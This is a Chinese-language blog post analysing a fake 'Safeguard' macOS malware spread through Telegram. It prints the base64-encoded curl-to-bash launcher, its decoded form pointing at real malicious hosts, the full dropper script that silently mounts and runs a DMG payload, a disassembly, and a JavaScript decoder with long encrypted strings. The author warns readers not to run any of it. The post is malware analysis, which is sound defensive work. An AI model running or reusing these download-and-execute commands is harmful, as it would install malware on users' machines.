这应该是第一次做病毒分析,还用上了AI。以前逆向都是反汇编静态分析加动态调试搞个几天,现在有了AI效率高了不少。

前言

这个伪Safeguard病毒应该是第二次见了,第一次是我媳妇某个好友通过Telegram给我媳妇发,第二次是刷推特的时候看见的

病毒分析

启动代码

Image

以下代码千万别运行

1
echo "Y3VybCAtayAtcyBodHRwczovL21hY29zLXRlbGVncmFtLmN5b3Uvc2FmZWd1YXJkLnNoIHwgYmFzaCAm" | base64 -d | bash &

上面base64编码解码后的内容如下(千万别运行)

1
curl -k -s https://macos-telegram.cyou/safeguard.sh | bash &%

看上去就是下载这个恶意脚本然后运行

safeguard.sh 分析

safeguard.sh 下载下来为以下内容(千万别运行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/bin/bash

DMG_URL="https://cdn-telegram.cyou/Safeguard.dmg"
DMG_LOCAL_PATH="/var/tmp/Safeguard.dmg"
MOUNT_POINT="/Volumes/Safeguard"
EXECUTABLE="Safeguard.file"

curl -k -s -o "$DMG_LOCAL_PATH" "$DMG_URL" >/dev/null 2>&1

[ ! -f "$DMG_LOCAL_PATH" ] && exit 1

hdiutil attach -quiet "$DMG_LOCAL_PATH" -mountpoint "$MOUNT_POINT" -nobrowse >/dev/null 2>&1

[ ! -d "$MOUNT_POINT" ] && exit 1

PAYLOAD_PATH="$MOUNT_POINT/$EXECUTABLE"
if [ -f "$PAYLOAD_PATH" ]; then
  chmod +x "$PAYLOAD_PATH"
  nohup "$PAYLOAD_PATH" >/dev/null 2>&1 &
fi

# (Optional) Cleanup steps could go here, also silently
# sleep 5
# hdiutil detach "$MOUNT_POINT" -force >/dev/null 2>&1
# rm -f "$DMG_LOCAL_PATH"
# rm -f "$0"

exit 0

这里可以看出这个代码会下载https://cdn-telegram.cyou/Safeguard.dmg 然后解压后运行里面的Safeguard.file,这个Safeguard.file是个二进制文件

Safeguard.file 分析

把这个程序反汇编看了一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
10000135a    int64_t _start()

100001371        char var_70
100001371        sub_100001798(&var_70, "pu*@bYgLaW<16f9Zd?($8C%DRoQP5Ok3…")
100001384        char var_d0
100001384        sub_100001798(&var_d0, "5069664d3576664651447541612a216d…")
100001397        char var_b8
100001397        sub_100001798(&var_b8, "6f676d7350694f723946755451766d71…")
1000013aa        char var_a0
1000013aa        sub_100001232(&var_a0, &var_d0)
1000013be        char var_58
1000013be        sub_100001110(&var_58, &var_a0, &var_70)
1000013ce        char var_88
1000013ce        sub_100001232(&var_88, &var_b8)
1000013df        char var_40
1000013df        sub_100001110(&var_40, &var_88, &var_70)
1000013e8        char* var_30
1000013e8        char* rdi_7
1000013e8        void var_3f
1000013e8        
1000013e8        if ((var_40 & 1) == 0)
1000013f0            rdi_7 = &var_3f
1000013e8        else
1000013ea            rdi_7 = var_30
1000013f4        _system(rdi_7)
1000013fd        char* var_48
1000013fd        char* rdi_8
1000013fd        void var_57
1000013fd        
1000013fd        if ((var_58 & 1) == 0)
100001405            rdi_8 = &var_57
1000013fd        else
1000013ff            rdi_8 = var_48
100001409        _system(rdi_8)
100001409        
100001412        if ((var_40 & 1) != 0)
100001418            operator delete(var_30)
100001418        
100001421        void* var_78
100001421        
100001421        if ((var_88 & 1) != 0)
100001427            operator delete(var_78)
100001427        
100001430        if ((var_58 & 1) != 0)
100001436            operator delete(var_48)
100001436        
100001442        void* var_90
100001442        
100001442        if ((var_a0 & 1) != 0)
10000144b            operator delete(var_90)
100001457        void* var_a8
100001457        
100001457        if ((var_b8 & 1) != 0)
100001460            operator delete(var_a8)
10000146c        void* var_c0
10000146c        
10000146c        if ((var_d0 & 1) != 0)
100001475            operator delete(var_c0)
10000147e        void* var_60
10000147e        
10000147e        if ((var_70 & 1) != 0)
100001484            operator delete(var_60)
100001494        return 0

看上去就是把两串加密后的脚本进行解密,然后通过system()这个函数进行执行。
然后找了下AI把反汇编代码分析了一下,写出了如下的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
// 完整的解码实现
function decodeHexString(hexStr) {
    let result = '';
    for (let i = 0; i < hexStr.length; i += 2) {
        const hex = hexStr.substr(i, 2);
        const charCode = parseInt(hex, 16);
        result += String.fromCharCode(charCode);
    }
    return result;
}

// 字符映射表
const charMap = "pu*@bYgLaW<16f9Zd?($8C%DRoQP5Ok37ME-Vmjlcw_Hq+rGTBFsA!vitn>KINU0";

// 加密的字符串
const encStr1 = "5069664d3576664651447541612a216d612a4f736f446437356a43716f2559736f28754150467541356c436d2a6c666d4f2a756a5125426d6f69574d526a576d356c36374f6749374f4c57216f6477776f4575466f25426d5244666d614c3f636f25743c2a443f466b6463572a443f6d506754374f766d726f674e6961406237507652375244755450676d2d52443f7750767437616d3f6d356a2177506a597161457541504675736f4464374f6a6d73512557716f2875415046756a522542736f6463576f256e56614c3f466b64776d506a64375125523c507674376f6a6d716f4466776b6a43463c4c754d4f674d733c6463573576434161676f736b457541504670542a376d41356c563c2a646d736f4464374f674d6d28443f6d50287541504675424f254e416f2564376f6a4e46502875476f45756424216657252a755452443f6361674e6a614c754d4f674d732a3756573576434161676f736b457541504670636f67493735764d6d506754373576664651447541612a61474f4466463176577750454e2b6f674273612a21725225216d61672b663f626d416f252167382166776b6a38373144574d4f467045612a52374f674d6d28443f6d5028563c2a2543726f2a7541356c563c2a44576d4f4c43465045756a3569633c6f256e5661676f77506743735144776d353777475045752b51763f7735454d735076216d28443f6d5028563c2a443f466b6463572a44666d4f2a756a5125426d38674e7351444d6452443f63614c3f47614c592150693f6d6f2a756a5069572b61674e6a612a4d6424216657252a755452443f6361674e6a614c6647502543574f67432b3c6463572a253f47614c66636f254271614c662d356a6d544f2a704550252b5651446137314470376145706a61676f7750674364506966776b59754d4f67373c2a2543726f2a7541356c563c6f256e56616721486f676d462a6a4e7261626f77506743395225216d3c676f775067436452443f633c6463574f4c576e2a37565735764341614c576d4f6a43463576435638675941512a754150467063356a43766f4457736f2875476f45756d4f6a43466b28752d51675946522566416f446137507652376f6a6d716f43754d4f67377761675973614c6641356a6d726f5463572a44666d4f2a7541356a6d2b5025435638675941512a7541504675416f444d41614062374f674d464f2870633c674e6a6f6c666d4f2a75476f4570453146613751257437356a43766f4457736f253f6452443f633c28702b6140627761674e6a614c576d4f6a43463576435638675941517063572a44666d4f2a756a51256e4d5059754d4f6737374f6749373c4c576d4f6a434635763837507652376f446f6d356c563752764d4d356a592d4f67434661674e6a614c3f465125212b6f253f6452443f633c28754d354675734f4c5777506a353c2a646d466f443f21356a74376f6a6d725225426452443f632a376d6d506a64374f4c576e2a6a43726f2a75675125426d246a592b6f6477475045752a6f256f47356a43675125426d246a592b6f284d6a5125426d38675941512a563c2a443f466b6463572a44666d4f2a7571524466413876424d357637374f67493750766f6a3576434161674e6a612a61476145757750457063356a43766f4457736f2875476f45756d4f6a43466b28752d51675946522566416f446137507652376f6a6d716f43754d4f67377761675973614c6641356a6d726f5463572a44666d4f2a7541356a6d2b5025435638675941512a7541504675416f444d41614062374f674d464f28702b3c67424d35693f2450675973512a70486140627761674e6a61676f775067436452443f632a375657356a43414f445772614c3f465125212b6f253f6452443f632a376d6d506a64374f4c576e2a6a43726f2a752a6f256f47356a43675125426d246a592b6f64774750457569356a6d416f433f6d6b4c64634f6743744f593f47436957774f67387161676f775067436452443f633c6463574f4c576e2a3756573576434161676f4750673f6d356d754d4f6737374f674937646a436a5069576d3f6a6d716f386e4d502538636f6a6d716f43754d4f6737772a37565750252b56514461636f6a4e716f67434638675941512a563c2a646d736f4464376f6a6d716f43576d6f457541504670635069756d5045756a506961375225662d6f44667361676f775067436452443f63614c4f774f6737374f6957774f6738373567434650256d7335766d475045563c2a646d69356a6d416f2875416f444d4143674e44356a6d416f2875415046756a5125426d386a436a614c66415244574151256e6c61675941616743476f3763572a2566715069666d6167592d527643733546756a5125426d386a436a2a376d6d506a64374f4c576e2a6a43726f2a7569356a6d416f433f6d6b4c643c50767437356a434d6f4c4f4651443f6d3c4c754d4f674d334f674e336f6a6d716f2854373567594151594e4d35214e7352446f6d3c6463574f4c576e2a3756573576434161676f775067434050766e416f256e41614c3f47614c576d522564373567594151594e4150214e6a5125426d2a3756573576434161676f4750673f6d356d754d4f6737374f674937646a436a5069576d3f6a6d716f386e4d502538633567594151594e4d35214e7352446f6d3c6463572a2521486f676d463c676f4750673f6d356d754d4f6737772a3756576f67493735764d6d506754373576664651447541612a572d524464376145706a614c592150693f6d6f2a756a5069572b61674e6a614c754d4f674d334f674e336f6a6d716f28706a612a61375a457045612a5237354443474f67435661676f47356a4137507652373567594151594e4d35214e7352446f6d2a376d6d506a64374f4c576e2a6a43726f2a75466f2559564f6957774f67383c50767437356a434d6f4c4f4651443f6d36454d5452443f6344693f4744766f7750673871614c754d4f674d3352446633357659766f28563c2a443f466b6463572a44666d4f2a756a507642566f44576452443f63614c3f4761673f47614c66636f254271614c662d356a6d544f2a70456f676d46506a592b6f287045612a5237354443474f67435661676f47356a4137507652373567594151594e4d35214e7352446f6d2a37565750252b56514461636f6a4e716f67434638675941512a563c2a646d416f25427161675954356742775276594151254e72612a576751256e566f4461452a4570372a64565735764341614c66474f44572d6f386f77506738374f67493738624e24284337376f6a6d716f28755452443f6344693f4744766f775067383752443637522542775244363c612a70572a646d736f4464376f6743734f676d7252443f7750766e67507642566f4461374f67493738624e24284337376f6a6d716f28756a507642566f44576452443f636167597361675971512559732a4570372a6456576f4c435450676d2d52443f6d614c66474f44572d6f386f77506738374f6749376f6743734f676d7252443f7750766e67507642566f4461374f766d41512a75466f44757152256677506a353c2a646d6d506a64374f674371507063576f256e56614c3f466b64776d506a6437356a434d6f4c4f4651443f6d363777475045757735413f77356a432d4f674e466b284d735076216d28443f6d5028563c2a443f466b6463572a44666d4f2a756a5125426d38674e7351444d6452443f63614c3f47614c592150693f6d6f2a756a5069572b61674e6a612a4d6424216657252a755452443f6361674e6a614c6647502543574f67432b3c6463572a44666d4f2a756a5125426d434c6d546f287541504670636f67493735764d6d506754373576664651447541612a576a5125426d612a2145612a61375745756a5125426d38674e7351444d6452443f633c6463572a256d6a61676f77506743386b44756d616743726f4c36374f766d41512a70456f676d466f2566415069576e61457541516743722a3756572a44576d4f4c434650457541356c436d2a3756576f256e5661676d6a2a375657356a43414f44577261676f4d504c666d2a376d6d506a64374f4c576e2a6a43726f2a757735413f77356a432d4f674e466b6477475045754c356a59453f6a4e716f67434624676d2b5144646335764e21356a666d3f6a4e716f674346312a75566f44664151256e4d4f676d4750566f4750673f6d3545563c2a443f466b6463572a44666d4f2a754552256e4838766d3e6f287541504670542a3756573576434161674374527643544f676d47506c663651446641614c3f47614c714531563f24442166415069576d61455437616d754d356c3f774f676d47506c3645312a704564764e566f287540522566636f286171612a5740522566636f286171612a572b524457486f44642b51676d734f674e466b28212d522566636f286e5f35764e7261455437616a77474f4457725225427361455437616d75466f446f776f444f73616c413c2a646d736f4464376f6a6d716f384277356964374f67493750676d734f2a756a507642566f44613735764e21356a666d3f6a4e716f674346614c4f774f674d474f44643751256e7651446677526a426d355463572a2521486f676d463c673f6d35693f77506a594151254e723f6a4e716f6743463c6463572a44576d3567434d4f2a756951443f6361676621356c576d506c3f574f67432b61676d7261676f7750674336514466412a3756572a256d6a61676621356c576d506c3f574f67432b61676d7361676e474f2a75775045756d6b67666d354c3f7750766e7324676d734f2a7541516743722a3756572a646d736f44643751443f6d5043754d4f6737374f67493735764e21356a666d3f6a4e716f674346612a523761454945612a523752694346356a43724f626d416f25413c2a6456572a44666d4f2a757352446f6d38675941512a7541504675566f44664151256e4d4f676d4750566f4750673f6d3545706a612a61476145706a61676621356c576d506c3f574f67432b2a3756572a646d776f45757735413f77356a432d4f674e466b284d774f67432b38675941512a56374f674d6d503763572a6456572a384f4652255767507642566f445736512521774f2a4d774f67432b38675941512a5437357659766f43754d4f6737772a3756572a646d6d504c666d2a3756572a6456573576434161676f736b4575415046756a5125426d35766d3e6f44616351443f6d5043754d4f6737772a3756572a645657357643416167574d506a2b245144776d614c3f476167574d506a2b245144776d612a71376f6c663e2a3756572a64565751255237526a5972512166776b6a38375a2a7042362a705f61406254362d64373c45704236406141614c3f636f25743c2a6456572a645657356a434d6f4c4f4651443f6d3c676d416f25216452443f63312a757352446f6d38675941512a563c2a6456572a646d6d506a64375125523c2a6456572a2543726f2a75776f3763572a646d6d506a64375125523c2a646d6d506a6437356a43546f2559412a376d6d506a64374f4c576e2a6a43726f2a754c356a59453f6a4e716f67434624676d2b5144643c507674373f69574d52566f4750673f6d35454d735069434652764367507642566f44617161673f6d35693f77506a594151254e723f6a4e716f6743463c6463574f4c576e2a3756573576434161674374527643544f676d47506c663651446641614c3f47614c714531563f24442166415069576d61455437616d754d356c3f774f676d47506c3645312a704564764e566f287540522566636f286171612a5740522566636f286171612a572b524457486f44642b51676d734f674e466b28212d522566636f286e5f35764e7261455437616a77474f4457725225427361455437616d75466f446f776f444f7361455437616a3f215044757361455437616a432b5076777761455437616c43736f4457336f67594152286171612a5733446943546f6759416f434e3361455437616c43736f4457336f6759415228364661455437616c43736f4457336f67594152283673616c413c2a646d736f4464376f6a6d716f384277356964374f67493750676d734f2a756a507642566f44613735764e21356a666d3f6a4e716f674346614c4f774f674d474f44643751256e7651446677526a426d355463572a2521486f676d463c673f6d35693f77506a594151254e723f6a4e716f6743463c6463572a44576d3567434d4f2a756951443f6361676621356c576d506c3f574f67432b61676d7261676f7750674336514466412a3756572a256d6a61676621356c576d506c3f574f67432b61676d7361676e474f2a75775045756d6b67666d354c3f7750766e7324676d734f2a7541516743722a3756572a646d736f44643751443f6d5043754d4f6737374f67493735764e21356a666d3f6a4e716f674346612a523761454945612a523752694346356a43724f626d416f25413c2a6456572a44666d4f2a757352446f6d38675941512a7541504675566f44664151256e4d4f676d4750566f4750673f6d3545706a612a61476145706a61676621356c576d506c3f574f67432b2a3756572a646d776f45757735413f77356a432d4f674e466b284d774f67432b38675941512a56374f674d6d503763572a6456572a384f4652255767507642566f44616351443f6d5043754d4f673771614c664d4f6a436452443f633c6463572a6456576f2542736f6463572a6456572a44576d52253f69356a6d416f284d774f67432b38675941512a5437357659766f43754d4f6737772a3756572a646d6d506a64375125523c2a6456576f256e5661676d6a2a3756576f256e56614c576d3567434d4f7063576f256e56614c3f466b64776d506a64373f69574d52566f4750673f6d3537774750457554524457736f386f673c676f77356a436a50693771614c4f4651443f6d50256d726f2a563c2a443f466b6463572a44666d4f2a752b6b386f7750674373614c3f47614c71453176664750762b776f4436723569597151443f6d6145543761454e6a5069572b51676d734f674e466b286e73352542774f673845312a704531762b6d6b2464726f676145312a7045317642476f766d7235466e5f35764e72616c413c2a646d736f4464376f6a6d716f384277356964374f67493750676d734f2a756a507642566f4461376f6a6d466f256f476b2a756951443f635069434161676d724f6a6d73512557716f44363c2a646d466f44756d524464374f766d41512a752d4f4457466f256e4128443f6d502875775045756a5125426d24676d734f7063572a646d736f4464376f6c754d4f6737374f6749374f6957774f67432b51256e56612a5237616a6f6a314661375745752d4f4457466f256e4128443f6d506463572a646d736f446437356a434d6f4c754d4f6737374f6749376f6a6d466f256f476b2a706a61676621356c576d506c3f574f67432b2a3756572a44576d3567434d4f2a756951443f6361626f675125426d61676d726167216e3f6a6d716f44363c2a6456572a44576d52253f69356a6d416f284d466f25595635675941512a706a61626f675125426d312a756a35675941512a706a61626f675125426d3c6463572a646d6d506a6437356a43546f2559412a3756576f256e56614c576d3567434d4f7063576f256e56614c3f466b64776d506a643735675946357643673f3777475045752d5167432d51696f4d50676d563c4c43736f4457725225216d312a7554524466734f764e466f594e6d506c3f6d356a43563c6463574f4c576e2a37565735764341614c576d356943714f2a7541504675565046757351674371502a757352695777354c6437616a3f73527654373145754d4f443f6350766e716b287045612a5237354443474f67435661676f47356a4137507652374f44666d356a6e4d50253837574575733567592d6f28706a614c592150693f6d6f2a756a5069572b61674e6a614c754d3569666950695756447643724f6743466f25643c2a646d776f4575466f446621504c643751443637506a4e41616743424f255971614c3f47612a6145614c3f636f25743c2a645657356a43414f44577261676f4d504c666d2a3756576f2542736f6463572a646d466f443f21356a74374f4c57216f6463572a2543726f2a75776f376357507674376f4457465069613c2a646d466f443f21356a74376f6a59713576383c2a2543726f2a7541356c563c6f256e56616766636f2566484f6a59715125643c507674376f764341354c4f563c4c43736f4457725225216d312a7569356a6d416f252177506a64772a376d41356c563c2a646d776f45752d5167432d51696f4d50676d563c4c43736f4457725225216d312a7045614556374f674d6d503763572a646d736f446437356a43734f254241614c3f4761673f47614c66636f254271614c662d356a6d544f2a70453576432d4f4457774f4c5637362d746a36287055612a4e566f445247506c4371502a756a51256e5631254f6d506a43465125362b3567597335694f47356a643731254f4d6159544564764d465076216d442a6137332a754d4f767137442a574b354c5777506c64375740574e442a61452a3756572a444f4651443f6d436743744f2a4d466f446621504c64375244363735693f4651256e6c312a7569356a6d416f252177506a643757457045502559734f674346356759733546212d514c5747502538453c6463572a2543713576383c2a645657356a43546f2559412a3756572a646d736f446437356a43734f254241614c3f4761673f7735697571524456376f676d4d50674e6c612a57286f4459215144576d6f2a7575354c75715125664d4f676d47504575616f2542546f44617244676e645067434d357638376f256e416f4461373567597335694f47356a64376f6a4e4661676647506c3f77506c436d314561376f67436a524443714f2a754d506c66696f446137614561374f766d41512a757752764e726167664d4f443f7750767437526c43414f674e723546754b61566647506c3f77506c436d616c41376f67436a524443714f2a75454f443f415076743761566647506c3f77506c436d6145756c51446f77506a35374f44703752256f416f44613736243854614c4f774f6737374f676d4150673837616d666e35693f6d50287564356a436a6f44576d506a666d354661374f766d41512a756351253f566f25743752256e734f7643462a3756572a646d736f4464373567597335694f47356a3f336f256e416f44576d6f2a7541504675416f444d41614c576d4f4c4346506a435661674e6a614c576d356943714f7063572a6456575125523752764d6d52762b76522542776f2a4d2135764346506a592b6f2854373567597335694f47356a3f336f256e416f44576d6f2a56374f674d6d503763572a6456572a444f4651443f6d436743744f2a4d54524466734f764e466f594e6d506c3f6d356a4356312a7569356a6d416f252177506a643757457045354c4f566145563c2a6456572a646d466f443f21356a74373567597335694f47356a3f336f256e416f44576d6f7063572a6456576f256e5661676d6a2a3756572a2543726f2a75466f44756d5244643c2a646d6d506a64375125523c2a2543726f2a7541356c563c2a44576d4f4c4346504570456137776d506a64376f764341354c4f562a6a4e7261674f4652255764504c436c51256e733c4c754d4f674d73312a757352446f6d38675941512a5437356742216f766d7224676d734f2a543751256e566f4437772a376d41356c563c2a646d736f4464376f6a6d716f384277356964374f67493750676d734f2a756a507642566f44613735675941514c36374f766d4151674e214f2a7577506c6f7735766d45506743732a375657356a43546f255941614c4f774f67373738626f7750673837512574376f6a6d716f3842773569643c2a645657356a43546f255941614c4f774f673737386742216f766d7261676d72614c75714f254f77505642773569643c2a6456572a256d6a612a4d643f6a6d716f28752d50766e4152256d7235467564504c436c51257477614c3f636f25743c2a6456572a646d736f446437506a436935675941512a75415046755452443f633546706a615975675125426d2a3756572a6456573576434161676e6d4f69664d4f6a435452443f63614c3f47614c664d4f6a436452443f63612a523761454945612a5237386742216f766d722a3756572a6456575125523751256e566f4437374f674d6d503763572a6456572a646d736f446437506a4369357659766f44754d4f6737374f674937506a4369357659766f44754d4f6737375745704531416d726f6743746f253f62644549452a3756572a6456576f256e5661676d6a2a3756572a6456573f69574d52566f4750673f6d35454d726f444f5452443f63312a75726f444f7352446f6d35675941512a563c2a6456572a2543726f2a75776f3763572a646d6d506a6437356a43546f2559412a3756576f256e56614c576d3567434d4f7063576f256e56614c3f466b64776d506a64376f69574d526d75714f254f77506c363c5076743752764d46507621774f2541634f6957774f67432b51256e56312a752d514c574750256d2150434e2b524470772a376d736f446437356742216f766d7224676d734f2a75415046754b616a2b6d6f256e6352766e2b6f67215f516a4d77506a665451254277516c756335676d4751673f5435676e4761455437616a4d45526a4f456f4475636f764e5f51252b4d516a4d6a526a4e2b5167422b50254e71504c75635276595661455437616a665f50252b726f677763506a596c52766f4535676d6d50256e486f4c75475025662d506a77455067215f61455437616a3f636f766e716f6975636f7666636f25576c5076432b5276776d51764356516a774551256f77516a6d5661455437616a4d776f6a596a6f76212d52763f546f252b5450674e2b516a774852766f6c50763f725167666d5067425f61455437616a2b4d50256f716f2559725167662b516a4371506a4d4d6f25425f50766e7750676e2b516c75485276772d61455437616a777250673f6a526a6d5650766e6a6f25425650255971526a6f71526a21716f2557455144752d506a426d61455437616a6f5652766e6d6f764e6c35676e2d50256f6d516a426a506a6f6a506a4e6a35676e6c6f676d6d516a6d7761455437616a2b71506a596d516a776c526a6d4550254d716f447563506a4d54502559476f6a4e636f762b546f762b5661455437616c755652253f5f51766f486f76664d6f6a4f455276437750256654526a2b4d50676e6a506a4354526a6e4861455437616a2b5f516a43456f672b6a6f25596c6f674e476f76596c526a4d6d356721455125214d35674d726f6a427261455437616a425651256e546f254348507657725167775f6f674e6a6f764f6a6f767771527643635167214d506a425f61455437616a3f486f674356504c756c6f67212b51762b6a516a59456f6a6f6d6f7659725125434d50256f4850672b2b61455437616a572d5069756c52764d635076772b6f764f2b6f6a6f77504c7571502557565125666c52256d6350672b5461455437616a2b546f6a66636f6a3f48516a4d2d5076434851673f716f674f6c6f254f6d526a6f4d5176594d51254e6c61455437616a6d56506a6e456f4c75715044756335676f716f6a6e7151764e2b6f69756a526c752d6f7643715069756c61455437616a21715167594852254f2b6f762b2b50766e636f674e7251672b54516a436d526a6f54516742776f766e6c61455437616a577735673f6352254f725269756c5225662d6f763f456f673f2b526c752d5225576c516a6d486f6a2b7261455437616a4f2d526a772b6f677777516a77546f6a6f483567576c6f672b4d507677545025597251256e4d51254e7261455437616a6e63506a2b4551764f5f51252b6c52766d6c52253f4750252b545167597152256e726f67664d3567774861455437616a576351674d71526a43546f672b455244754d6f677756506a6e47516a2b456f766d4751254e56526a6d2d61455437616a4d4751254f6351254f2b506a4d6c51762b565225437252256f6c506a436a5176662b5144756a516a4e7261455437616a2b716f764d63506a2b6d6f25597152764e63516a774d506a775f6f67596d6f254f6c50256f2b504c757161455437616a6e48526a6d636f6a576d50764f4d6f2559476f254d716f256f7251764e56526a436a6f69756c51766e7261455437616a6f63526a4e635125214d6f25424550764d54516a574550673f2d506a4f2d506a5954506a3f476f67775461455437616a43456f6a6d56354c7571516759456f25435635676e63516a6e47526a4f6350762b5451256d475076425f61455437616a432b6f25434d35677748526a6645356757546f76594d6f766f2d5167212d6f764f7150254345506a437261455437616a6f716f676f546f766d546f6a6e2d6f766e566f6a4e71527657486f67436d51766e45526a57725167662d61455437616c756d506a77716f673f5f5176776c35676e48506742455076662d6f674f2d5276434835672b2d526a6d7261455437616a6f635125424d5167437750254f7151254f726f673f48516a4f476f6a2b2d526a4f6d51764d6d506a576361455437616a4d2b6f254e45506a6f726f6a662b6f672b5652762171526a426c52254f2b6f6c756a526a4e776f25596a61455437616a66775167214752253f4d51254f635276435f5069754d5025216a526a21566f67662b6f6743485276776d61455437616a42476f67662d516a77456f674d6a52252b4d6f252b5651255963502543566f6a57776f2542566f766d4861455437616a4e2b52255945526a436a526a21775125776d6f676e6c3567426a516a217250764e543567572d50672b4861455437616a665f6f25426a35674254506743456f67775f6f256e71504c755f52765771502577486f6a666a6f6a6e6d61455437616a777250674f4d5025432d526c752b526a595f516a6f635025212b50674d6d516a2b6d5025435f6f67214d61455437616a6f5451764d6c5044754551253f2b51254e6c6f254f71506a3f6a526a2b6d6f766f5650676e4d516a6e6a61455437616a57776f6a6d56516a2b2d6f4c756c6f6a6e71526a665f35673f486f676672526a6d4750764e47526a426c61455437616a592b5176215f516a212b6f6a42566f674e6c50254d54516a424751252177356757476f6a6e6a516a6d6361455437616a6f7135676d2d51256d716f25216c5167572b6f6a59715125664d516a4e4750674d48517643726f6a437161455437616a4d2d6f6a425451256e2d354c75546f67667151256e6d5225422b52256e565125772d50256e48526a4f7261455437616a596d5225666351766e2b6f256f54516743545276667750766e4550764e6352762b47506a4e6d6f25216c61455437616a6e715076575452252b6c6f76214552764f56526c755f35676e4d6f762156526a3f636f674d6c35674d4861455437616a2147502559486f4c752d5067214d35674d715225216c516a66726f67576c6f6a6648516a6f546f25215461455437616a21726f6a6d6a6f256f485225776c50766f48527677486f2521776f676d4d6f25664752766e48516a436361455437616a6f72506a436c35674d715076575f6f4c75485167432d524475485125775f6f672b6c5276776351766d4561455437616a4363516a6d45504c752d52765748506a2b6c512521776f6a424550764f6c52766f6a5044755451674d5461455437616a6d7151675971516a6f776f764248506a4f6c52764e6d6f764348506a776c51673f6c522521546f6a6f4861455437616c756c5125594d6f766f486f766645506a217751254e716f252b2d6f6a2171516a3f4d6f763f635067662b61455437616a6f72516a4d2b51764d6350252b45516a2b48522557726f676672506a4e6c52254f476f7657726f25432d61455437616a576a506a596d506721475025437750254d713567216c516a6e5f50697563514c754851764e71516c754d61455437616a6d2b5067664d50256f6d506a6d4d51253f775076436a50676d6a50766e6a516a436d354c754550673f4d61455437616a2156516a216a6f676f6a6f67662b506a4e4550676d6c506a216c35674e2b5025576d6f6a59566f6a6f5661455437616a4e47512543546f674f5f516a6e635276217152254e456f6a6d72526a4e2b6f7643456f6a4f4d526a426361455437616c752d506a3f5f51672b77506a6e4852254e636f6a6f6d5225422b50672163522543545169752b6f762b4561455437616c75546f675956526a435f5176215f506a436a50673f5452763f5f51676e483567575f51766d4850766d5461455437616a666c6f2543476f4c756a52254f5f5276436d6f6a6d6d6f6a422b6f676f54514c75715176437250676f4861455437616a3f7152764e453567777751254f5451252b47507657475167214d526a4363516721636f6a4e476f67574561455437616a777751253f775225597151254d2b50254d566f67776c526a6e456f763f6a6f6a426d50674e2d3567594861455437616a57475269754751766d2b5125662d504c754d512543486f256e4d6f2543716f254d56516a427150766f4761455437616c754752762154504c754d5276664d506a4d2b506a4271526a574835674f6a50676d7750257771516a4f4761455437616a665451674d716f76216c5225216d50763f7251672b5f6f6721483567597250674371506a42475167594761455437616a212d50764d7750676e2d526a6f4d5167572b6f763f5f517657546f25212d52766d775076426c52764f6d61455437616a57473567664550256d54506a775652763f6a6f6a426a6f7677566f763f5f6f25772b6f6975475225594561455437616a2b6335672b54526a572d527666565025212d5067215451254f566f763f565225576d512542486f4c755661455437616a435f516a424d6f676d72506a66486f674f5f6f25216d517643456f4c756d50762b4551252b636f6a667761455437616c75635176574d5025436a51256e6c6f76214d51764f48504c75485067775f50254f77526a4e63506a574d61455437616a43545244757751673f545067595f52763f72506a2b566f256d4d5167426c51254f476f6a42475125576c61455437616a4d54527642486f256f4d6f764e7151254d475167574752256f54516743566f67212b6f763f6a6f6a772b61455437616a665f50764e4835675748516a6e5451762148506a43566f764f6d6f2566775176595450766e2d5225424561455437616a665450252b6d6f674e77356766545125216c6f25665450254f5450673f6a35674e63516c75715169755461455437616a21476f67776a6f67772d50763f2b6f254d723567662d6f6777726f7621566f6a595f6f764f4d5076436361455437616a6d45506a435f6f676f5f5025214835676672504c756d526a2b7150256e485076434751254d476f6a432d61455437616a596a526a6645516c754535676f4d6f67424850254d2b527642635176436d50763f2b5225212d6f6a422d61455437616a2b72527666636f676d6c5076576c51674372526a574d6f673f47516a7772506a59476f766f5435676f5f61455437616a436a526a4f716f764e6a50766d543567576c5276776d35676e635125577152256d4552766e2d50674f4861455437616a212d526a6d6c5025777752256f6d6f767772506a4e6c6f253f775076436c6f6a6f4550764e776f76427761455437616a6f2d52764f2b506a4f71526a4d4d516a6d47522542475176572d51253f635276597751764d715269752b61455437616a4d7251674e45516a212d5125572d51676e2b6f76426a526a4256526a6f4d526a666c52252b7250672b5f61455437616a5954506a43635276772b506a43726f6975725025662d35675977526a772b51674d4752253f4d5125664761455437616a43725225576c526a3f6a5276574d6f254d2b526a6d6c52252b77516a774d526a3f546f676e775025426c61455437616a216c6f6a6f486f6a57776f676d63516c754752254e2b52257771526a4f2d51673f5650676d2d6f69757261455437616a6f473567216d6f674f7251766f546f25576c50674254356743566f67212b5076666352764e4751764d2d61455437616a7747516a4d6a6f254e6d6f672b5451764f71526a6f7750253f6a522557546f676f5f52254e475067596a61455437616a592b5025777151256e6a6f252b4850764e2d51764e6c6f6a4d5651764f2d50764d5f5067576350256f6a61455437616a5945517659635176664551676e6c522543453567666c6f6a216351764e77507643565276434751254f5461455437616a3f2d526a77546f765748516a4e475025436d506a595f6f67594551256d2d5225575f50677771506a6f5461455437616a4f486f254371506a3f4550676e4750256f2b516a6e4735674d4551676f635276774552766e6d50252b4d61455437616c7572506a3f54506766455176594852697571517677725076426c526a2b566f7677775176776d6f676e2b61455437616a66473567777251256f2d6f2566566f253f475276435f3567594d3567435452254f4d50763f6c3567576361455437616a4d6c526a43775144754d5025666c526a3f5f51676f6a50676d6a51764f6d51674e2b506a216c50674f4861455437616a214852764d475225597751256f476f67666a50672145524475636f674f6d51253f475276595f52253f5461455437616a437150672b56526a595451674d716f4c756d522577456f447547526a596d52764e4752254e4d6f6c756c61455437616a2156506a596c506766485076216d6f253f6a526a4e6c6f25595f6f6a595f50766f2b6f6a4f545076596d61455437616a6e48506a4d776f254d7151764277354c754d6f6a5948522543485067576d6f76426d52766d6a5167595661455437616a6648517642635176594d526a572b6f67774852254d775225595450676d4835673f566f672b6d506a6d2d61455437616a6f2b526a424d354c756c50766d775067576c52256f63516a2b716f254d636f6a6d6a526a3f475276436d61455437616a6e54514c757135674f4752252b635167772d51672b48516721776f764f4d51766d5f506a2b636f6a6e5661455437616a